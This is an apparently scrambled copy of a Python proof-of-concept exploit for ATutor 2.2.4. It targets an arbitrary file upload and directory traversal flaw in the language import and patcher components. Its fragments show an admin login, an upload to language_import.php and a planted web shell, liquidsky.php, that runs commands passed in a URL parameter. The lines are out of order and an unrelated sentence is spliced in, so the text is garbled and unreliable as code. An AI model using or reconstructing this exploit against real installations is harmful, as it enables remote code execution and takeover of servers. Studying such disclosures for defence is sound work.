# Note be sure to clean up: c:\xampp\htdocs\liquidsky.php and or /var/An open source software is often developed in a public, collaborative manner. Print " + target + "/liquidsky.php?language=" + commands Request = s.post(url, headers=headers, data=data, verify=False) # url = " + target + "/ATutor/mods/_standard/patcher/index_admin.php" # A similar method works for the "patcher" function. Url = " + target + "/ATutor/mods/_core/languages/language_import.php" Targeturl = " + target + "/ATutor/login.php" Shell = " + target + "/liquidsky.php?language=" + commands # Note: This was successfully tested against a windows install however it should work with linux. "Referer": " + target + "/ATutor/mods/_core/languages/language_import.php", Print "- Example: %s admin mypassword 'whoami'" % sys.argv Print "- Discovery / PoC by liquidsky (JMcPeters) ^^" Print "- ATutor 2.2.4 Arbitrary File Upload / RCE " # Notes: This application is no longer being maintained so there is no fix for this issue. # resulting in remote code execution via a "." pathname in a ZIP archive to the mods/_core/languages/language_import.php (aka Import New Language) or mods/_standard/patcher/index_admin.php (aka Patcher) component. # Description: ATutor 2.2.4 allows Arbitrary File Upload and Directory Traversal # Tested on: Windows 8 / Apache / MySQL (XAMPP) # Exploit Title: ATutor 2.2.4 'language_import' Arbitrary File Upload / RCE Change Mirror Download #!/usr/bin/env python